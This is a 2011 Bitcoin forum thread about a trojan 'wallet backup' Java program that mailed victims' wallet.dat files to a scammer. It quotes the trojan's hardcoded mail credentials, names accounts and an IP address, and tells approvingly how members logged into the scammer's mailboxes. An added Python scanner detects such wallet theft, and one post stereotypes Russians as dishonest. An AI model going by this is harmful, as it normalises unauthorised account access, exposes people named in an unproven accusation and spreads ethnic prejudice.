Bitcoin Forum
Author Topic: The case of the Russian Scammer.  (Read 7997 times)

Matt Corallo (Hero Member), February 19, 2011, 05:21:35 PM, #1

The following is a write-up of the stealing of Blitzboom's wallet by a Russian scammer's (who goes by Hummer and Tolsi) trojan "wallet backup program".  It is written here for those who are interested to read, both as an account of the stupidity of the scammer, and as a warning to those who download programs from anywhere without running them.
More information can be found in the #bitcoin-dev logs from Feb 19 starting at 12:40.

Blitzboom downloaded a java program claiming to backup your wallet to a dropbox folder, and to a gmail address (see link 1, posted by Hummer).  Really it just sent the wallet.dat file to the gmail account of a russian scammer and deleted it.  Blitzboom then asked on #bitcoin-dev why his client was having problems and posted a copy of the program which he used.
As it turns out, the scammer was so kind as to leave the .java source files in the jar of the program.  ArtForz found a particularly nice line of code:
Code:
return new PasswordAuthentication("safer.mail.ever", "Goran Zvetkovic (22:41:38 17/02/2011)Goran Zvetkovic (22:41:38 17/02/2011)");
Which, as it turns out, was the username and password to our scammer's gmail account.  A bit more digging, and we find that it sends its victims' wallets to bitcoin.backup@gmail.com (which, conveniently, also has the same password).  Thus, some of the members logged into his accounts and were able to download all the scammed wallets.  In the bitcoin.backup account was Blitzboom's wallet and several which held the same accounts, from different times.  The safer.mail.ever account held similar results in the sent mailbox, including more (the oldest of which were sent to tolsi.ru@gmail.com, backupbitcoins@insorg-mail.info, and katyabor1@mail.ru instead of bitcoin.backup@gmail.com).  As it turns out, the duplicated wallets had received the bitcoins which were transferred from Blitzboom's wallet.  Most likely, the scammer decided to test his program before releasing it.

The copy in the bitcoin.backup account was an old copy and one member was able to recover 20 BTC from it (it only had 20, as someone had apparently taken 30 about 17 minutes before).  The copies on safer.mail.ever, on the other hand, held the full 154.36 which Blitzboom had lost (minus the 50 which had already been withdrawn with the other wallet).  The remaining 104.36, as well as the other 20, were returned to Blitzboom at a new address on a new wallet.  That left the 30 withdrawn minutes before.  This one took a bit of sleuthing.

The 30 was withdrawn to 1N3DDnrpQkUdEhTNGFGU572TpMqfcLwSFD which had, conveniently, also received a payout of 1.1 BTC from slush's pool 30 minutes later.  While waiting for slush to get online, Keefe noticed something very interesting.  In the scammer's wallet, there was an account which is labeled Forum Donate (starting with 1ABvwv, see screenshot 1).  This account just so happens to be one used in the signature of Tolsi (see screenshot 3, link 2).  This clearly links the scammer's wallet to Tolsi.  Thereafter, slush was able to corroborate this in that the email registered to the 1ABvwv... (see log).  

In the end, Tolsi got away with 30 BTC (Blitzboom appears to have been the only one scammed).  Remember, never download a program off the internet, especially one that has access to your bitcoin wallet.  
I'd like to thank ArtForz, Keefe, slush, and several others who wished to remain nameless.
Also, thanks to Blitzboom for the fun it was to steal from a Russian scammer.

Screenshots:
Screenshot 1 (The scammer's Bitcoin wallet)
Screenshot 2 (The scammer's Bitcoin wallet)
Screenshot 3 (Tolsi's donate address)

Links:
Link 1 (The original download post)
Link 2 (Google's Cache of Tolsi's donate address)


Log of #bitcoin-scammer (so as not to fill -dev with scam-related messages):
Quote
<BlueMatt> slush, is the 1N3DDnrpQkUdEhTNGFGU572TpMqfcLwSFD address tolsi's?
<BlueMatt> the remaining 30 are in 1N3DDnrpQkUdEhTNGFGU572TpMqfcLwSFD, dont know who it is, thats why I wanted to ask you.
<BlueMatt> Your pool paid him 1.1 earlier today
<Keefe> paid that addr
<slush> BlueMatt: yes
<slush> He changed his pool address to this today
<BlueMatt> dam, well in that case. Sorry Blitzboom, looks like you lost the last 30
<slush> between 9am and 2pm of UTC

Bitcoin Ubuntu PPA maintainer - donate to me personally: 1JBMattRztKDF2KRS3vhjJXA7h47NEsn2c
http://bitcoinrelaynetwork.org maintainer
PGP ID: 07DF 3E57 A548 CCFB 7530  7091 89BB B866 3E2E65CE
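The hardcoded PasswordAuthentication literal and the bundled .java sources were what gave the trojan away. As an added triage example (not part of the original post, and not the scammer's or the forum's code), here is a Python script that statically scans a jar for those same indicators: shipped source files, javax.mail PasswordAuthentication calls with literal credentials, embedded email addresses, and references to wallet.dat. The jar it scans is a constructed sample with placeholder account names, not the real program.

```python
import io
import re
import zipfile

# Indicators drawn from the thread: bundled .java sources, a javax.mail
# PasswordAuthentication call with literal credentials, and wallet.dat handling.
CRED_RE = re.compile(r'PasswordAuthentication\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+\.[\w.]+')
WALLET_RE = re.compile(r'wallet\.dat')

def scan_jar(jar_bytes: bytes) -> dict:
    """Statically scan every member of a jar (a zip archive) for the indicators above."""
    findings = {"sources": [], "credentials": [], "emails": set(), "wallet_refs": []}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith("/"):  # directory entry, nothing to read
                continue
            data = zf.read(name)
            if name.endswith(".java"):
                findings["sources"].append(name)
            try:
                text = data.decode("utf-8")
            except UnicodeDecodeError:
                # .class files are binary, but constant-pool string literals stay readable
                text = data.decode("latin-1")
            for user, password in CRED_RE.findall(text):
                findings["credentials"].append((name, user, password))
            findings["emails"].update(EMAIL_RE.findall(text))
            if WALLET_RE.search(text):
                findings["wallet_refs"].append(name)
    findings["emails"] = sorted(findings["emails"])
    return findings

def build_sample_jar() -> bytes:
    """Constructed sample jar shaped like the trojan described above (placeholder values)."""
    src = '''import javax.mail.*;
public class Backup extends Authenticator {
    protected PasswordAuthentication getPasswordAuthentication() {
        return new PasswordAuthentication("sender.account.example", "hardcoded-secret");
    }
    void run() { send("exfil.mailbox.example@gmail.com", new File(home, "wallet.dat")); }
}
'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Backup.java", src)
        zf.writestr("Backup.class", b"\xca\xfe\xba\xbe" + b"\x00" * 8)  # fake class stub
    return buf.getvalue()
```

Running `scan_jar(build_sample_jar())` reports the source file, the credential pair, the destination mailbox and the wallet.dat reference; on a real jar, any non-empty `credentials` or `wallet_refs` is reason enough not to run it.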

kiba (Legendary), February 19, 2011, 05:26:46 PM, #2

The image link doesn't work.


Garrett Burgwardt (Sr. Member), February 19, 2011, 05:28:22 PM, #3

The image links are just formatted improperly. Remove the quotation marks and it works fine.

kiba (Legendary), February 19, 2011, 05:29:14 PM, #4

Quote
The image links are just formatted improperly. Remove the quotation marks and it works fine.

I do not see question marks.


Matt Corallo (Hero Member), February 19, 2011, 05:29:36 PM, #5

My bad, fixed.


Garrett Burgwardt (Sr. Member), February 19, 2011, 05:29:50 PM, #6

There are some in the link, but reread what you need to remove Wink

Tolsi (Full Member), February 19, 2011, 05:30:20 PM, #7

Yes, it's my mail. Yesterday I received some spam and deleted it. I did not use a purse until this evening and saw these operations. I thought this was 100 BTC for my services. But where have they gone? Could someone use my purse?
When I saw this, I swapped my wallet and address in my signature.
I have been slandered, do you want me to be quiet? Looks like a good bases, all of this.

PS: Do not make this show. I am an honest man.

Like what am I doing? 1FzSgYpLG4fpy2Q9fKXQsuLxHN81m4P3dR

Matt Corallo (Hero Member), February 19, 2011, 05:33:28 PM, #8

Yes Tolsi, in an email address with 5 emails, all of them identical, none of them deleted or marked as spam.  All of them are spam.  Very likely.  And the scammer didn't take any of your money but gave all of Blitzboom's to you.


kiba (Legendary), February 19, 2011, 05:34:58 PM, #9

Quote
Yes, it's my mail. Yesterday I received some spam and deleted it. I did not use a purse until this evening and saw these operations. I thought this was 100 BTC for my services. But where have they gone? Could someone use my purse?
When I saw this, I swapped my wallet and address in my signature.
I have been slandered, do you want me to be quiet? Looks like a good bases, all of this.

Unless the scammer executed a convoluted plot to implicate you in the scam... it's very unlikely that you are not the scammer.

(Also, you and the scammer use the same word, "purse")


Tolsi (Full Member), February 19, 2011, 05:43:03 PM, #10

Quote
Unless the scammer executed a convoluted plot to implicate you in the scam... it's very unlikely that you are not the scammer.

(Also, you and the scammer use the same word, "purse")

It's a very convoluted plot. For me too.
Many Russian users managed to get confidence in my services for Bitcoin. Also, I help many people on the forum with their miners. I'm good, rly! Please remove my name from this story, I want to keep it clean.
PS: I use translate.google.ru  Wink As I write myself, I use wallet
PS: changed the password in the mail.


Blitz (Donator, Legendary, "Cut Your Loose"), February 19, 2011, 05:47:25 PM, #11

I’ve learnt my lesson from it, I guess.

The awesome thing is how everyone worked together to get me back my BTCs and make this possible. Thanks to all of you.

What happened here is very interesting because it shows that, even without official institutions, the community itself can possibly identify and punish wrongdoers and refund victims, although it was Tolsi's stupidity which made this easy.

If you ever want to establish yourself SOME trust in this community, send the 30 BTC back to me, to this particular address: 12EWfVucUxuf2m7tWyoit5UMSVhQZ68yBC

If I happen to get the payment, I will announce that and shut up about it, and people will either forget about it or choose to forgive you.

"Bitcoin had been transformed from an anarchistic challenge to the financial status quo, to the crypto spawn of Satan, fuelled by cut-throat greed and delusions of avarice." - MatTheCat
"these people don't seem to want to stop till Bitcoin is completely destroyed and left like an old cum rag in the corner of the room." - ShroomsKit

kiba (Legendary), February 19, 2011, 05:51:44 PM, #12

Quote
It's a very convoluted plot. For me too.
Many Russian users managed to get confidence in my services for Bitcoin. Also, I help many people on the forum with their miners. I'm good, rly! Please remove my name from this story, I want to keep it clean.
PS: I use translate.google.ru  Wink As I write myself, I use wallet
PS: changed the password in the mail.

Until I hear other Russians testify, I don't believe you.


Tolsi (Full Member), February 19, 2011, 05:55:37 PM, #13

Quote
Until I hear other Russians testify, I don't believe you.

I communicate with the moderator of the Russian section, I hope he will help us to sort it out.
I earn bitcoins very slowly (5-7 per day); if it will help remove all of these lies about my name, I thought in a couple of days I'll give them to you. Huh I can send you 1.95 BTC now, the rest later, does that suit you?


Nefario (Hero Member, GLBSE Support support@glbse.com), February 19, 2011, 05:58:52 PM, #14

This is so interesting.

PGP key id at pgp.mit.edu 0xA68F4B7C

To get help and support for GLBSE please email support@glbse.com

Matt Corallo (Hero Member), February 19, 2011, 06:03:10 PM, #15

If an admin does want to comment, the IP address of the Russian scammer (from Gmail's logs) was 91.203.66.66.  If you want to prove your innocence, have a forum admin post that Tolsi has NEVER used that IP address to post on here (I'm assuming logs are kept).  Until then, I think the evidence speaks for itself.


Tolsi (Full Member), February 19, 2011, 06:05:48 PM, #16

It's my IP address now.  Shocked And from what IP did this Hummer visit? The IP is my ISP's, many may use it.
It's someone from my local network. So, ban me.


Hal (VIP, Sr. Member), February 19, 2011, 06:15:26 PM, #17

Why are so many Russians dishonest? Is it because of all those years of communism, a system built on lies? Or does it go deeper in the Russian culture? Are Russian children even taught by their parents not to lie? Are they taught sayings like "honesty is the best policy", and stories like George Washington and the cherry tree?

Hal Finney

LZ (Staff, Legendary, "Satoshi everywhere!"), February 19, 2011, 06:35:06 PM, #18

From this moment I am representing Tolsi's interests. Can someone provide me with all the evidence of Tolsi's guilt?

Hal, we had a very criminal 90s. Cry

"Never invest unless you can afford to lose your entire investment." © S3052

mail2345 (Newbie), February 19, 2011, 06:46:52 PM, #19

Hal: Or maybe it's a disproportionate sample sort of thing. Maybe honest Russians don't like the bother of the language barrier to trade with English speakers, and dishonest Russians just deal with it because hey, there's tons of money in scamming.

BTC Address: 12TJbeJ2aCzCppJ6m1yYoPUdp9EHWRTQNv

LZ (Staff, Legendary, "Satoshi everywhere!"), February 19, 2011, 07:33:23 PM, #20

A few screenshots that I want to see:
  • the screenshot confirming the link between tolsi.ru[at]gmail.com
    (which is owned by Tolsi) and bitcoin.backup[at]gmail.com or katyabor1[at]mail.ru
  • the IP address that was used by Hummer (btw he uses a different time zone in his forum profile)
  • and also the date and the time when Tolsi's wallet file was sent to the address of the fraudster
